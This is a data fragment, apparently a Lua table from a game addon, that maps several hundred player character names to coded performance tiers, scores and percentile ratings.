["Psymist"] = "ET:767/92%SB:795/99%SM:994/99%",
["Rimunda"] = "ET:388/89%EB:683/93%EM:828/89%",
["Albiss"] = "ET:695/86%EB:614/84%LM:920/95%",
["Washinurback"] = "ET:765/93%LB:770/98%SM:978/99%",
["Raquella"] = "ET:710/88%EB:464/87%EM:854/91%",
["Dloh"] = "LT:804/96%EB:649/90%EM:871/94%",
["Suzyq"] = "ET:712/88%EB:568/81%RM:519/61%",
["Davrin"] = "ET:711/88%EB:492/90%EM:795/89%",
["Ralphee"] = "ET:691/86%EB:639/88%EM:803/86%",
["Fatheroffour"] = "ET:687/86%LB:729/96%LM:946/98%",
["Grievous"] = "ET:765/93%SB:702/99%LM:955/98%",
["Ginabean"] = "ET:757/92%LB:720/96%LM:762/96%",
["Layna"] = "ET:335/84%EB:658/91%EM:778/85%",
["Classïc"] = "ET:723/89%EB:661/91%LM:932/97%",
["Babygøth"] = "LT:639/98%LB:760/98%LM:924/96%",
["Retna"] = "ST:800/99%SB:853/99%SM:987/99%",
["Mohjinn"] = "LT:752/95%EB:739/93%LM:917/95%",
["Hordemommy"] = "ET:730/93%LB:779/97%EM:897/91%",
["Shinbal"] = "ET:601/79%LB:769/97%EM:786/82%",
["Remind"] = "LT:746/95%LB:772/97%LM:933/95%",
["Taygeta"] = "LT:756/96%SB:804/99%LM:975/98%",
["Tatari"] = "ET:740/94%SB:775/99%EM:738/94%",
["Onninenine"] = "ET:722/92%LB:774/97%LM:962/97%",
["Krokue"] = "ET:725/92%LB:782/98%EM:898/93%",
["Pecando"] = "LB:766/96%LM:943/95%",
["Neowrath"] = "ST:796/99%SB:864/99%SM:973/99%",
["Shierak"] = "ET:637/84%LB:664/96%EM:897/92%",
["Rama"] = "ET:742/94%LB:763/96%LM:965/97%",
["Sittypeepee"] = "LT:750/95%LB:770/97%EM:788/83%",
["Fastlad"] = "ST:827/99%LB:781/97%SM:1032/99%",
["Luânâ"] = "ET:730/94%SB:803/99%LM:961/97%",
["Shootindice"] = "LT:496/96%LB:773/97%LM:966/97%",
["Ggpewpew"] = "LB:779/97%LM:941/96%",
["Modnoc"] = "ET:735/93%LB:791/98%LM:968/97%",
["Papadab"] = "ET:246/78%SB:800/99%LM:954/97%",
["Schnacks"] = "ET:671/91%EB:687/87%LM:954/97%",
["Numnutz"] = "ET:694/90%LB:762/95%LM:974/98%",
["Axecutioner"] = "ET:721/93%EB:736/93%LM:984/98%",
["Vîable"] = "ET:726/93%LB:750/95%LM:960/96%",
["Reanima"] = "ET:738/94%SB:802/99%SM:941/99%",
["Vìska"] = "ET:725/93%LB:767/96%EM:861/89%",
["Blitzkriege"] = "LT:785/98%LB:793/98%EM:833/87%",
["Jackmama"] = "LT:787/98%EB:750/94%EM:879/90%",
["Quokka"] = "LT:752/95%LB:773/97%EM:913/93%",
["Kaguyasama"] = "LT:779/98%SB:759/99%LM:926/95%",
["Dalran"] = "ET:715/92%LB:783/98%LM:949/96%",
["Beastianelli"] = "ST:737/99%LB:786/98%EM:681/91%",
["Jasker"] = "ST:685/99%LB:739/98%LM:946/96%",
["Dollheart"] = "ET:722/92%LB:778/97%LM:962/97%",
["Jojostar"] = "LT:759/96%LB:773/97%EM:932/94%",
["Contorted"] = "ET:682/88%EB:595/93%EM:868/91%",
["Lumbean"] = "LT:530/97%LB:662/96%EM:912/93%",
["Chuggy"] = "LT:770/97%LB:713/98%LM:802/95%",
["Aztenos"] = "ET:700/90%LB:754/95%EM:853/90%",
["Elitee"] = "LT:492/96%LB:776/97%LM:983/98%",
["Bigmike"] = "RT:382/55%SB:817/99%SM:1007/99%",
["Sachi"] = "LT:474/95%LB:773/97%EM:900/93%",
["Wayfar"] = "ET:737/94%LB:777/97%LM:947/96%",
["Easybakeoven"] = "ET:708/92%LB:687/97%EM:888/91%",
["Simpleton"] = "ET:728/93%SB:845/99%SM:1006/99%",
["Tgivs"] = "LT:761/96%LB:772/97%LM:993/98%",
["Popepeabody"] = "ET:737/94%SB:777/99%LM:955/96%",
["Lekcian"] = "ET:591/77%LB:754/95%EM:754/79%",
["Rutomarauder"] = "RT:550/74%EB:723/91%EM:849/88%",
["Liability"] = "ET:729/93%LB:760/96%SM:1006/99%",
["Dorksy"] = "ST:798/99%LB:787/98%SM:991/99%",
["Maheehoo"] = "ST:805/99%SB:865/99%SM:1025/99%",
["Partaaytay"] = "ET:282/84%LB:756/95%EM:532/84%",
["Ironage"] = "LT:779/98%LB:683/97%EM:875/92%",
["Aeronis"] = "ET:733/94%LB:770/97%LM:930/95%",
["Abracadadam"] = "LT:789/98%SB:777/99%LM:984/98%",
["Saintnicolas"] = "ST:823/99%SB:833/99%SM:1075/99%",
["Hallzey"] = "LT:762/97%EB:746/94%EM:855/88%",
["Martyo"] = "ET:623/82%EB:739/93%RM:583/62%",
["Phyzix"] = "LT:767/97%LB:770/97%LM:973/98%",
["Erogenusbeef"] = "ET:666/87%LB:758/95%EM:765/80%",
["Notsummer"] = "RT:535/72%LB:777/97%EM:825/85%",
["Yupperz"] = "LT:586/98%EB:733/92%EM:806/86%",
["Conda"] = "LT:498/96%LB:675/96%EM:869/90%",
["Khent"] = "ET:672/84%LB:752/97%LM:958/98%",
["Shengur"] = "LT:794/95%SB:808/99%SM:990/99%",
["Freezeyami"] = "ET:737/90%EB:539/93%EM:597/89%",
["Amelio"] = "RT:538/68%LB:708/95%LM:907/96%",
["Virtuous"] = "LT:843/97%LB:733/96%LM:938/97%",
["Shochu"] = "ST:777/99%SB:735/99%LM:870/98%",
["Sunbrand"] = "ET:418/92%LB:615/97%EM:674/93%",
["Spongge"] = "LT:847/97%LB:760/97%SM:966/99%",
["Yunaiv"] = "LT:668/98%EB:535/93%LM:882/95%",
["Epickiki"] = "ET:658/81%EB:722/94%EM:892/93%",
["Lynnlin"] = "ET:455/93%LB:728/95%EM:675/93%",
["Wandra"] = "ET:338/84%LB:745/97%LM:974/98%",
["Dairymomo"] = "ET:781/93%SB:778/99%EM:845/91%",
["Hoovers"] = "LT:856/98%LB:673/98%LM:932/96%",
["Smokedout"] = "ET:586/75%EB:656/90%EM:759/85%",
["Saviorkarl"] = "ET:689/86%EB:678/92%EM:781/87%",
["Basola"] = "ET:484/94%EB:717/94%LM:977/98%",
["Cosmickid"] = "ET:795/94%LB:762/98%EM:819/89%",
["Rakatashi"] = "ST:781/99%SB:781/99%EM:910/94%",
["Zaku"] = "LB:746/96%LM:961/98%",
["Mutepriest"] = "ET:460/93%LB:741/97%EM:839/90%",
["Elementpaws"] = "ET:763/91%LB:728/95%LM:912/96%",
["Dynatron"] = "ET:452/93%EB:692/94%LM:779/97%",
["Priestsz"] = "LT:594/97%EB:699/94%LM:979/98%",
["Ripntear"] = "LT:854/98%LB:749/97%SM:1005/99%",
["Full"] = "LT:821/96%LB:770/98%LM:981/98%",
["Vanillasky"] = "ET:496/94%LB:747/96%EM:906/94%",
["Callipygos"] = "RT:538/68%EB:668/91%EM:843/90%",
["Karlbartos"] = "LT:821/96%LB:713/96%LM:803/97%",
["Æonius"] = "ET:789/94%LB:660/98%SM:963/99%",
["Capk"] = "ST:815/99%LB:738/97%SM:992/99%",
["Verta"] = "LT:570/97%SB:712/99%SM:907/99%",
["Phazedtv"] = "RT:529/67%EB:645/89%EM:781/85%",
["Halfbuzzed"] = "LT:811/95%LB:636/97%LM:947/97%",
["Reizzy"] = "ET:792/94%SB:799/99%SM:1025/99%",
["Nightdreamer"] = "ET:598/77%LB:747/97%LM:900/95%",
["Dayglo"] = "ST:730/99%LB:640/97%LM:781/96%",
["Lillyz"] = "ST:711/99%LB:748/98%SM:963/99%",
["Nighteyes"] = "ET:797/94%LB:749/97%LM:926/96%",
["Critzahoy"] = "ET:417/90%LB:765/97%EM:905/94%",
["Pankeks"] = "ET:648/81%LB:564/95%EM:832/90%",
["Yakisoba"] = "LT:809/95%LB:711/95%LM:896/95%",
["Dranzdervish"] = "LT:857/98%LB:762/98%SM:978/99%",
["Jadey"] = "ET:692/86%EB:672/91%EM:764/83%",
["Searanox"] = "ET:739/89%EB:698/93%LM:824/97%",
["Spiste"] = "ET:286/76%LB:725/95%EM:876/93%",
["Varri"] = "ST:930/99%SB:787/99%LM:979/98%",
["Meaxd"] = "ET:726/89%LB:618/97%EM:715/82%",
["Haggrid"] = "LT:820/96%SB:774/99%LM:907/95%",
["Niia"] = "ET:325/82%LB:761/98%LM:973/98%",
["Kriggle"] = "ST:717/99%LB:663/98%LM:770/96%",
["Toakenshield"] = "ET:696/87%LB:753/97%LM:903/96%",
["Xteena"] = "ET:660/82%EB:672/91%EM:858/92%",
["Cileste"] = "LT:860/98%LB:764/98%SM:986/99%",
["Igniubi"] = "ET:795/94%LB:670/98%EM:862/92%",
["Jandiya"] = "LT:834/96%EB:716/94%EM:839/89%",
["Ajala"] = "ET:361/86%LB:576/95%LM:949/98%",
["Hae"] = "LT:599/97%LB:706/95%LM:975/98%",
["Emiikoo"] = "ET:643/80%SB:716/99%EM:903/93%",
["Lucioun"] = "ET:298/79%EB:666/92%EM:854/91%",
["Morarina"] = "LT:806/95%SB:796/99%LM:967/98%",
["Ellysa"] = "ET:402/89%LB:625/96%EM:707/94%",
["Mikipuff"] = "ET:750/91%EB:695/94%SM:928/99%",
["Akheeno"] = "LT:512/95%SB:779/99%LM:924/97%",
["Oriiana"] = "LT:788/98%LB:686/98%LM:827/98%",
["Mork"] = "LT:751/95%LB:755/95%EM:918/94%",
["Moistcookie"] = "ST:808/99%SB:812/99%LM:996/98%",
["Magebladex"] = "ST:888/99%SB:795/99%SM:1037/99%",
["Hbizzy"] = "ST:723/99%LB:793/98%LM:988/98%",
["Johnwayn"] = "LT:748/95%LB:666/96%EM:866/91%",
["Lunatics"] = "ET:716/92%LB:693/98%LM:948/96%",
["Clapperoni"] = "ET:739/94%EB:711/90%LM:919/95%",
["Kildarsy"] = "LT:758/96%EB:730/92%EM:890/91%",
["Firedog"] = "ST:793/99%LB:791/98%LM:987/98%",
["Blurbulate"] = "ST:685/99%LB:757/97%EM:890/92%",
["Zipy"] = "LT:785/98%LB:779/98%EM:882/92%",
["Virginity"] = "ST:854/99%SB:859/99%SM:993/99%",
["Saarn"] = "LT:779/98%SB:818/99%SM:1001/99%",
["Sneakdaddy"] = "LT:759/96%LB:774/97%EM:908/93%",
["Ebeh"] = "LT:785/98%SB:816/99%LM:939/96%",
["Pedz"] = "ET:707/91%EB:731/92%RM:616/69%",
["Bfly"] = "ET:739/94%EB:586/93%EM:842/87%",
["Siarmeaux"] = "ST:780/99%SB:805/99%LM:949/96%",
["Kildars"] = "LT:780/98%SB:816/99%LM:974/98%",
["Adeh"] = "LT:775/97%LB:783/98%SM:1000/99%",
["Ej"] = "ST:795/99%SB:739/99%LM:996/98%",
["Zigzagoon"] = "ST:695/99%SB:803/99%LM:989/98%",
["Vibez"] = "ST:911/99%SB:875/99%SM:1040/99%",
["Whogryps"] = "ST:795/99%LB:790/98%EM:912/94%",
["Amazintwo"] = "ST:815/99%LB:768/97%LM:984/98%",
["Apothalix"] = "ST:793/99%LB:776/98%LM:979/98%",
["Terayon"] = "ET:741/94%LB:757/95%EM:833/86%",
["Fuel"] = "LT:782/98%SB:819/99%SM:996/99%",
["Syp"] = "LT:763/96%LB:773/97%EM:852/89%",
["Velaxia"] = "LT:783/98%LB:792/98%LM:1000/98%",
["Pinkers"] = "ST:826/99%SB:893/99%SM:1070/99%",
["Xyl"] = "ST:746/99%LB:768/96%SM:1015/99%",
["Disappointed"] = "LT:781/98%SB:764/99%LM:958/97%",
["Alwayz"] = "ST:795/99%SB:834/99%LM:975/98%",
["Cyruss"] = "LT:768/97%LB:657/96%LM:973/98%",
["Vasken"] = "LT:619/98%LB:721/98%LM:979/97%",
["Toxyk"] = "LT:785/98%LB:787/98%LM:972/97%",
["Orcsista"] = "LT:774/97%LB:766/96%LM:956/97%",
["Magemoo"] = "ST:800/99%SB:850/99%LM:984/98%",
["Keanurv"] = "LT:765/96%EB:738/93%SM:1001/99%",
["Polywrath"] = "ST:804/99%EB:724/94%EM:848/93%",
["Monkcom"] = "ST:815/99%SB:861/99%SM:1036/99%",
["Supermaan"] = "ET:712/91%LB:766/96%LM:917/95%",
["Reebs"] = "ST:797/99%LB:767/96%LM:923/95%",
["Oldxueqiuqiu"] = "LT:777/98%LB:783/98%LM:930/95%",
["Yeshwa"] = "ST:810/99%SB:814/99%SM:990/99%",
["Tampeon"] = "ST:858/99%SB:848/99%SM:1049/99%",
["Aroden"] = "LT:783/98%SB:774/99%LM:939/97%",
["Youngotti"] = "ST:847/99%SB:865/99%SM:1053/99%",
["Cassidy"] = "LT:756/96%EB:722/94%LM:932/95%",
["Nootchy"] = "ST:850/99%SB:816/99%LM:956/97%",
["Thötianna"] = "LT:788/98%LB:791/98%EM:909/92%",
["Stunnur"] = "LT:767/97%EB:564/91%LM:938/96%",
["Shortcircuit"] = "LT:778/98%SB:717/99%LM:931/98%",
["Baselock"] = "ST:810/99%SB:885/99%LM:984/98%",
["Lifedrainz"] = "LT:787/98%SB:807/99%LM:974/98%",
["Trù"] = "LT:743/95%LB:666/98%EM:853/90%",
["Excervis"] = "LT:767/97%SB:809/99%LM:966/96%",
["Frozenbolt"] = "LT:782/98%LB:779/97%LM:952/97%",
["Doggo"] = "LT:766/97%SB:758/99%EM:694/76%",
["Mcminger"] = "ST:774/99%LB:645/95%EM:804/84%",
["Superwarm"] = "LT:770/97%EB:712/94%LM:871/95%",
["Akadia"] = "LT:761/97%LB:792/98%LM:946/97%",
["Keth"] = "LT:686/98%LB:789/98%LM:824/96%",
["Daladed"] = "ST:803/99%LB:773/97%SM:1009/99%",
["Helltwo"] = "ET:724/93%EB:620/86%EM:798/90%",
["Evilshifu"] = "ST:677/99%LB:678/97%LM:922/95%",
["Raemielle"] = "ST:812/99%LB:779/98%SM:938/99%",
["Wolow"] = "ET:275/75%EB:498/90%EM:759/83%",
["Crailblock"] = "ET:272/75%LM:966/98%",
["Farallones"] = "LT:501/96%SB:682/99%EM:727/80%",
["Donadin"] = "ET:705/88%EB:600/84%RM:429/50%",
["Komet"] = "ET:770/93%LB:741/97%LM:927/97%",
["Mikuwu"] = "ET:761/92%EB:683/93%LM:927/96%",
["Fayz"] = "ET:732/89%EB:456/87%EM:849/91%",
["Mananangal"] = "ET:751/91%LB:728/96%SM:981/99%",
["Omeow"] = "ET:680/84%EB:693/93%LM:963/98%",
["Chillgreenz"] = "LT:830/96%LB:733/97%LM:916/97%",
["Holler"] = "LT:821/96%EB:723/94%EM:868/91%",
["Kena"] = "ET:737/89%LB:759/97%LM:906/95%",
["Goodmantudou"] = "LT:770/98%LB:739/98%LM:916/97%",
["Woshinidama"] = "ET:376/88%EB:666/92%EM:789/86%",
["Dokterplants"] = "ET:717/90%LB:750/97%LM:941/97%",
["Shîfty"] = "LT:807/95%SB:791/99%SM:1007/99%",
["Roccoh"] = "ET:703/87%EB:655/90%EM:854/91%",
["Milkjugzz"] = "ET:685/87%LB:564/95%EM:845/93%",
["Sarok"] = "ET:721/88%EB:533/93%EM:869/92%",
["Homerun"] = "ET:676/84%EB:646/90%EM:769/87%",
["Mckin"] = "ET:784/94%LB:747/96%EM:847/92%",
["Zoomiezoom"] = "ET:720/90%LB:759/97%SM:984/99%",
["Vongreg"] = "LT:784/95%EB:531/93%EM:860/92%",
["Spacewalk"] = "ET:649/81%EB:697/94%EM:807/87%",
["Jerryatric"] = "ET:791/94%EB:700/93%LM:939/96%",
["Jail"] = "ET:727/90%LB:751/97%SM:902/99%",
["Twobooty"] = "ET:466/94%LB:724/95%LM:921/95%",
["Thunderballs"] = "ET:747/90%LB:746/96%LM:959/97%",
["Justduhua"] = "ET:627/80%EB:604/84%EM:888/94%",
["Laode"] = "LT:859/98%LB:730/96%EM:836/91%",
["Nauzd"] = "ST:811/99%LB:637/98%EM:683/93%",
["Hommiedclown"] = "ET:774/93%SB:738/99%LM:943/97%",
["Hempknight"] = "ET:691/88%LB:734/96%LM:954/97%",
["Oldrui"] = "ET:726/89%LB:718/96%EM:887/94%",
["Dcupheals"] = "LT:533/96%LB:761/98%EM:898/94%",
["Healmcpickle"] = "ET:681/86%EB:656/91%EM:764/83%",
["Anarra"] = "ET:689/86%EB:663/90%LM:947/97%",
["Oakenhealed"] = "ET:577/77%EB:605/83%EM:829/89%",
["Allindia"] = "ET:671/84%EB:577/82%LM:969/98%",
["Hank"] = "ET:776/92%LB:741/96%LM:918/95%",
["Rokhen"] = "LT:805/96%EB:688/94%EM:673/78%",
["Ariesm"] = "ET:667/83%EB:461/87%EM:816/86%",
["Seulgi"] = "ET:783/94%EB:627/87%EM:891/93%",
["Thautraal"] = "ET:656/82%EB:425/84%EM:445/79%",
["Lianli"] = "LT:795/95%LB:760/98%LM:908/95%",
["Edelgardvh"] = "LT:801/95%SB:716/99%EM:860/94%",
["Kellyjones"] = "ET:704/87%LB:699/95%LM:741/96%",
["Drgreene"] = "ET:688/86%EB:705/94%EM:820/88%",
["Alariiele"] = "ET:371/88%LB:608/97%EM:665/93%",
["Polycarp"] = "ET:776/93%LB:747/97%LM:940/97%",
["Divine"] = "ET:739/92%SB:788/99%SM:986/99%",
["Hoødz"] = "LT:790/95%LB:730/95%LM:936/96%",
["Modnar"] = "LT:458/95%LB:757/98%EM:901/94%",
["Holybud"] = "ET:397/89%EB:605/84%EM:848/93%",
["Bighuge"] = "LT:818/96%LB:736/96%EM:863/91%",
["Micca"] = "RT:563/74%EB:515/92%EM:802/87%",
["Smyrna"] = "LT:818/96%LB:720/96%EM:895/94%",
["Centari"] = "LT:865/98%SB:791/99%SM:986/99%",
["Nokos"] = "LT:842/97%LB:656/97%EM:862/90%",
["Maruta"] = "ET:391/89%LB:747/98%LM:889/95%",
["Snibbler"] = "LT:812/96%EB:540/93%SM:987/99%",
["Aavi"] = "ET:688/85%RB:515/71%EM:747/82%",
["Drgreenz"] = "RT:570/72%EB:632/88%EM:835/90%",
["Slickythicc"] = "ET:728/91%EB:612/87%EM:765/83%",
["Sykö"] = "ET:775/93%LB:723/95%LM:921/95%",
["Vb"] = "LT:595/98%LB:767/96%LM:989/98%",
["Alexamor"] = "ST:686/99%LB:758/95%LM:978/98%",
["Zalaka"] = "ET:695/90%SB:795/99%LM:966/97%",
["Grrchopp"] = "RT:365/52%EB:728/92%EM:609/89%",
["Interstallar"] = "LT:662/98%LB:735/98%EM:873/91%",
["Stormtokes"] = "ET:713/92%EB:749/94%EM:920/94%",
["Constantien"] = "ET:716/91%LB:760/96%EM:822/86%",
["Ochs"] = "ET:722/93%LB:729/98%SM:922/99%",
["Crushed"] = "ST:825/99%SB:836/99%SM:1034/99%",
["Platedbrotha"] = "LT:750/95%LB:777/97%LM:980/98%",
["Squag"] = "ET:659/86%LB:761/96%EM:910/93%",
["Logz"] = "RT:199/69%LB:720/98%LM:944/96%",
["Zaiken"] = "ST:799/99%SB:832/99%SM:1141/99%",
["Talents"] = "LT:775/97%LB:769/97%LM:973/98%",
["Sixtwo"] = "ET:715/92%LB:759/95%EM:907/93%",
["Twigz"] = "ST:798/99%LB:784/98%LM:990/98%",
["Dawgg"] = "RT:420/55%EB:744/94%EM:883/90%",
["Jünger"] = "LB:773/97%LM:973/98%",
["Kasean"] = "ET:661/87%EB:729/92%EM:550/79%",
["Dankquan"] = "LT:749/95%SB:766/99%LM:976/98%",
["Payzilla"] = "ET:694/90%EB:736/93%EM:877/92%",
["Tomciz"] = "LT:790/98%SB:810/99%SM:1019/99%",
["Raíyn"] = "LT:665/98%SB:796/99%LM:959/97%",
["Sneakyjuan"] = "LT:775/97%LB:791/98%LM:945/96%",
["Knifehat"] = "ET:693/89%LB:758/95%LM:965/97%",
["Joshlel"] = "LT:782/98%LB:775/97%EM:915/93%",
["Lorieth"] = "LT:757/96%EB:749/94%EM:842/87%",
["Kalameat"] = "LT:760/96%SB:801/99%LM:969/98%",
["Aerithe"] = "LT:752/95%SB:793/99%LM:963/97%",
["Fierce"] = "ET:680/88%EB:747/94%EM:839/87%",
["Escanor"] = "ET:719/92%EB:747/94%EM:779/90%",
["Skanka"] = "ST:681/99%LB:789/98%LM:966/98%",
["Allrithin"] = "ET:679/88%EB:747/94%EM:913/93%",
["Juicemaster"] = "LT:764/97%LB:769/96%LM:967/98%",
["Mausoleum"] = "UT:296/40%EB:746/94%EM:730/93%",
["Whiskeysour"] = "ST:806/99%LB:780/98%LM:979/98%",
["Soqq"] = "ET:691/90%EB:750/94%EM:825/88%",
["Slits"] = "RT:545/73%LB:688/97%LM:817/96%",
["Toesuck"] = "UT:255/34%EB:743/94%EM:894/91%",
["Noxuoz"] = "ST:867/99%LB:787/98%SM:1058/99%",
["Sporkchop"] = "ET:716/92%LB:724/98%EM:823/87%",
["Kuai"] = "LT:786/98%LB:787/98%LM:946/96%",
["Deeyee"] = "LB:786/98%SM:1008/99%",
["Edgewalkerr"] = "ET:568/76%EB:750/94%LM:974/98%",
["Thedoric"] = "LT:786/98%LB:772/97%LM:927/96%",
["Kiageng"] = "ET:561/76%SB:837/99%SM:987/99%",
["Seriouslybro"] = "LT:758/96%LB:702/97%EM:726/92%",
["Tum"] = "LT:785/98%SB:848/99%SM:1004/99%",
["Xiaoniuer"] = "ET:613/81%LB:758/95%EM:869/91%",
["Dieallyscum"] = "LT:505/96%LB:686/97%EM:596/86%",
["Bonethizz"] = "LT:786/98%SB:830/99%SM:926/99%",
["Deadeyé"] = "ST:793/99%LB:790/98%LM:953/97%",
["Chubbychaser"] = "LT:761/96%LB:754/95%LM:956/97%",
["Maxotaur"] = "ET:640/85%LB:774/97%SM:1023/99%",
["Zal"] = "ET:713/91%LB:767/96%EM:885/92%",
["Ðark"] = "ET:673/88%LB:774/97%LM:952/96%",
["Möbile"] = "LT:581/97%LB:732/98%SM:1017/99%",
["Mushoracle"] = "ET:576/84%LB:777/98%LM:905/96%",
["Quits"] = "LT:776/97%SB:757/99%LM:960/97%",
["Dibulio"] = "ET:708/91%EB:731/92%EM:870/90%",
["Ldydthgrp"] = "ET:734/93%LB:760/96%EM:904/93%",
["Kiruna"] = "ET:742/94%LB:716/98%LM:937/96%",
["Galivus"] = "LT:630/98%LB:710/98%EM:868/93%",
["Obscurai"] = "ET:615/81%EB:744/94%EM:421/76%",
["Rheumatoid"] = "ET:733/93%LB:785/98%LM:960/97%",
["Taiden"] = "ET:693/90%LB:750/95%LM:964/97%",
["Powerhaus"] = "ET:716/92%LB:721/98%EM:888/91%",
["Lumycat"] = "ST:818/99%SB:852/99%SM:1017/99%",
["Loydjr"] = "ET:685/89%SB:810/99%LM:980/98%",
["Krueleno"] = "RT:223/72%LB:756/95%EM:883/90%",
["Kitiara"] = "ET:393/93%LB:771/97%LM:974/98%",
["Fortwarrior"] = "UT:268/39%LB:751/95%EM:882/91%",
["Nugz"] = "ET:569/76%EB:745/94%EM:914/93%",
["Sniped"] = "LT:766/96%LB:682/97%EM:905/93%",
["Botanik"] = "RT:511/66%LB:754/97%LM:954/97%",
["Druidkang"] = "LB:708/95%LM:885/95%",
["Astela"] = "ET:793/94%LB:732/96%LM:949/98%",
["Hamms"] = "LT:496/95%LB:730/95%LM:910/96%",
["Edarling"] = "LT:554/97%LB:752/98%LM:778/96%",
["Snape"] = "ET:411/91%LB:681/98%EM:873/92%",
["Btwimgay"] = "LT:518/96%EB:674/92%EM:652/92%",
["Solljus"] = "ET:694/87%LB:714/95%EM:897/94%",
["Deretla"] = "ET:442/78%EB:645/89%EM:691/81%",
["Pototo"] = "LT:568/97%EB:547/93%LM:842/98%",
["Abiu"] = "ET:785/93%LB:719/95%EM:883/93%",
["Rolledoats"] = "RT:520/66%EB:685/93%EM:755/82%",
["Windshaper"] = "ET:776/92%LB:746/97%EM:751/83%",
["Believelight"] = "RT:469/60%LB:724/95%EM:794/85%",
["Umber"] = "ET:787/94%LB:745/97%LM:956/97%",
["Minitrue"] = "RT:493/66%EB:699/94%EM:877/93%",
["Jaytee"] = "ST:735/99%SB:707/99%LM:921/95%",
["Ysae"] = "LT:611/98%LB:728/96%EM:899/94%",
["Plight"] = "LT:548/97%EB:656/91%EM:574/88%",
["Tenseiga"] = "ET:292/82%LB:725/96%EM:891/93%",
["Healkinz"] = "RT:505/66%EB:681/92%RM:587/65%",
["Rollinheat"] = "ET:631/80%EB:702/94%LM:914/95%",
["Valenciaa"] = "ST:699/99%SB:708/99%EM:846/92%",
["Karith"] = "EB:499/90%RM:626/73%",
["Cherrycup"] = "LT:537/96%LB:626/97%EM:764/81%",
["Caya"] = "ET:287/76%LB:733/95%EM:836/88%",
["Nexxis"] = "ET:629/79%LB:746/97%LM:960/98%",
["Pettytheft"] = "ET:788/93%LB:783/98%LM:974/98%",
["Grase"] = "LT:814/95%SB:784/99%SM:1002/99%",
["Boombazelle"] = "RT:241/70%EB:694/92%EM:904/94%",
["Hella"] = "LT:515/96%LB:707/95%EM:895/94%",
["Garnieth"] = "ET:384/90%EB:704/94%EM:734/82%",
["Surgic"] = "LT:637/98%LB:741/97%LM:913/96%",
["Kildarsz"] = "RT:547/69%EB:627/88%EM:706/78%",
["Saintpaladin"] = "ET:738/90%LB:714/95%EM:809/89%",
["Biscotto"] = "ET:703/89%LB:710/96%LM:953/97%",
["Dampdruid"] = "LT:814/95%LB:614/97%LM:964/98%",
["Nerfs"] = "LT:813/96%LB:742/97%LM:971/98%",
["Dexma"] = "ST:901/99%LB:762/98%LM:887/95%",
["Ohmoko"] = "ET:698/86%EB:550/94%EM:725/82%",
["Healos"] = "ET:709/88%LB:763/98%LM:952/97%",
["Chickenpizza"] = "LT:590/97%SB:822/99%SM:974/99%",
["Deathpriesty"] = "ET:427/91%EB:668/92%EM:859/92%",
["Huange"] = "LT:675/98%LB:731/95%EM:819/89%",
["Rogane"] = "ET:650/82%EB:689/93%EM:874/94%",
["Sarumgar"] = "ET:727/88%LB:727/95%EM:883/94%",
["Reduce"] = "RT:460/58%LB:747/97%EM:879/92%",
["Soos"] = "ET:750/90%LB:735/95%LM:936/96%",
["Holyrollin"] = "CT:190/22%EB:605/85%EM:632/91%",
["Weast"] = "RT:252/71%EB:689/94%EM:869/92%",
["Momomen"] = "ET:619/77%LB:684/98%EM:916/94%",
["Lambert"] = "ST:803/99%LB:758/95%EM:906/93%",
["Odium"] = "LT:768/97%LB:784/98%LM:940/96%",
["Dataillang"] = "LT:793/98%EB:721/91%EM:846/87%",
["Edibles"] = "LT:788/98%SB:793/99%SM:1003/99%",
["Chiinaa"] = "ST:716/99%EB:604/83%EM:851/92%",
["Mordrius"] = "LT:759/96%LB:707/98%LM:979/98%",
["Cejudo"] = "LT:769/97%LB:719/98%LM:930/96%",
["Hodor"] = "LT:789/98%LB:765/96%LM:908/96%",
["Bonzai"] = "ET:720/92%LB:772/97%EM:844/87%",
["Thurokiir"] = "LT:790/98%LB:750/95%LM:979/98%",
["Phillyphilx"] = "LT:654/98%LB:792/98%LM:949/96%",
["Xertacus"] = "LT:788/98%EB:749/94%EM:905/94%",
["Phorq"] = "LT:775/97%SB:827/99%LM:967/97%",
["Rycketz"] = "LT:782/98%SB:771/99%EM:832/91%",
["Paydzll"] = "ET:724/93%EB:705/89%SM:1027/99%",
["Doosty"] = "LT:544/97%LB:759/95%EM:889/91%",
["Glais"] = "LT:769/97%LB:713/98%EM:922/94%",
["Dahmerr"] = "LT:756/95%LB:758/95%LM:959/97%",
["Turkleton"] = "ET:695/90%LB:716/98%EM:733/77%",
["Et"] = "LT:786/98%LB:652/95%LM:936/96%",
["Dancingclown"] = "LT:680/98%SB:825/99%SM:1008/99%",
["Pinkturbo"] = "ET:679/88%LB:704/97%EM:924/94%",
["Owenhart"] = "LT:767/97%SB:799/99%SM:1037/99%",
["Lonesword"] = "LT:781/98%LB:790/98%LM:979/98%",
["Swoahp"] = "LT:766/97%LB:796/98%LM:978/98%",
["Fuegoxd"] = "LT:791/98%LB:787/98%LM:927/97%",
["Winnielewi"] = "LT:783/98%LB:781/98%EM:912/94%",
["Cmax"] = "ST:853/99%SB:806/99%SM:1058/99%",
["Flume"] = "LT:742/95%LB:774/97%LM:951/96%",
["Pandacat"] = "ST:814/99%SB:795/99%LM:957/96%",
["Chadslayer"] = "LT:779/98%LB:791/98%EM:917/94%",
["Tipsi"] = "ST:811/99%SB:729/99%LM:976/98%",
["Jackwar"] = "ST:816/99%SB:811/99%SM:1009/99%",
["Slipperypete"] = "ST:800/99%SB:834/99%LM:963/97%",
["Squuid"] = "LT:788/98%LB:794/98%LM:965/97%",
["Januaryninth"] = "LT:772/97%LB:670/98%EM:799/90%",
["Karakkas"] = "ST:749/99%LB:791/98%LM:959/97%",
["Coronithia"] = "ST:792/99%LB:751/95%EM:836/88%",
["Beacons"] = "ET:712/91%EB:746/94%LM:895/98%",
["Famed"] = "ST:818/99%SB:713/99%LM:993/98%",
["Mini"] = "ST:821/99%SB:845/99%SM:1007/99%",
["Pilates"] = "LT:752/96%LB:795/98%LM:984/98%",
["Stanorak"] = "ET:737/94%LB:773/97%LM:991/98%",
["Vaughn"] = "ST:814/99%SB:843/99%SM:1065/99%",
["Alez"] = "LT:785/98%LB:752/97%LM:987/98%",
["Floortaste"] = "LT:774/97%LB:768/96%SM:1000/99%",
["Flaminhotty"] = "ET:710/91%EB:712/90%EM:880/90%",
["Irritable"] = "ST:888/99%SB:857/99%SM:995/99%",
["Kedeviss"] = "ST:824/99%SB:883/99%SM:1088/99%",
["Cassieofc"] = "LT:747/95%EB:517/92%LM:980/98%",
["Slyman"] = "ST:849/99%SB:815/99%SM:1024/99%",
["Clarencexd"] = "ST:794/99%SB:815/99%SM:1033/99%",
["Limp"] = "LT:642/98%LB:772/98%LM:935/95%",
["Pizzazz"] = "ST:806/99%LB:775/98%LM:974/98%",
